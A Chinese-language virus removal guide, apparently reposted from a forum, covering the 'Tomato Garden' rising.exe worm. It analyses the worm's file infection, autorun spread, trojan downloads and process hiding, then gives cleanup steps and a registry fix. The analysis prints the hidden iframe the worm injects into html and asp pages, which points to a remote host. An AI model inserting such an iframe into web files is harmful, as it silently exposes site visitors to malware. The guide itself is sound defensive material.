番茄花园病毒rising.exe(修改系统时间并感染exe)的清除

　　今天发现此种病毒求助者见多，收到样本后，利马测试了一下。该病毒就是前些日子流行的“修改系统时间”的病毒之变种。此次变种可谓是集N种破坏性病毒之大成了。主要破坏功能有：1.感染exe 并使得被感染的exe的公司等属性变为“番茄花园”

　　2.感染html asp 等文件插入恶意代码
　　3.通过双击磁盘启动
　　4.下载木马，盗网游帐号
　　5.修改注册表使系统无法显示隐藏文件
　　6.通过hook API 函数导致任务管理器中无法看见其进程

　　分析报告如下：

File: rising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B

rising.exe 运行后首先释放一个rising.eve的文件然后由rising.exe启动他
之后释放139CA82A.EXE 139CA82A.dll（随机的8个数字字母组合成的文件名）到系统文件夹
注册服务139CA82A.EXE
139CA82A.EXE控制winlogon进程使得139CA82A.dll插入几乎所有进程

释放rising.exe 和autorun.inf 到每个分区使得双击磁盘启动
感染除系统分区外的exe文件使得其公司名全变为番茄花园
感染 html asp 等文件在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>

修改系统时间随机把年份往前调月，日不变
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值为 0x00000000
导致无法显示临时文件

rising.exe 还会hook 多个 API函数使其进程在任务管理器中隐藏

使用Explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为K117815XXXXX.exe
XXXXX代表随机
到系统文件夹

由于每台机器上下载的木马的名称不同但最后结果相同所以中间释放的过程省略
最后这些木马运行后分别释放了如下文件
C:\WINDOWS\system32\buchehuo.exe（创建了服务inetsvr）

C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe

C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe

C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe

C:\WINDOWS\system32\winsock.exe

临时文件夹下释放upxdnd.exe和upxdnd.dll

　　解决办法：

　　安全模式下(开机后不断按F8键然后出来一个高级菜单选择第一项安全模式进入系统)

　　首先把系统日期改回来
　　然后打开sreng(可到down.45it.com下载)
　　启动项目注册表删除如下项目

<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []

　　“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，
　　选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr

把下面的代码拷入记事本中然后另存为1.reg文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

　　双击1.reg把这个注册表项导入注册表

　　然后双击我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。

　　右键点击C盘点击右键菜单中的“打开”打开C盘（千万不要双击）（如图）
　　删除如下文件

C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\system32\139CA82A.DLL（随机的8个数字字母组合成的文件名）
C:\WINDOWS\system32\139CA82A.EXE（随机的8个数字字母组合成的文件名）
C:\WINDOWS\system32\K117815XXXXX.exe（XXXXX代表随机数字）
清空C:\Documents and Settings\用户名\Local Settings\Temp

　　右键点击分别打开系统分区以外的分区还是点击右键菜单中的“打开” （千万不要双击）

　　删除每个分区下面的autorun.inf和rising.exe文件

　　最后使用专杀全盘杀毒(可到down.45it.com下载)

　　电脑软硬件应用编辑注：本文来源为：剑盟论坛，作者newcentury，本文为在原创作者的基础上进行整理和修改上建立的。如有疑问请请发布评论即可。我们会做相关处理。谢谢支持和合作

搜索

番茄花园病毒rising.exe(修改系统时间并感染exe)的清除